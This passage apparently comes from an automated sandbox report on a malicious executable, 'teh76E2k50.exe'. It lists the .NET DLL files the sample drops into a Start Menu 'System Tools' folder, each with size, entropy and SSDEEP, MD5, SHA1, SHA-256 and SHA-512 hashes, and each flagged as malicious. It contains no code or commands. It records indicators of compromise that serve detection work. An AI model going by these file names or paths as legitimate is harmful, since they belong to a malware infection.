                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
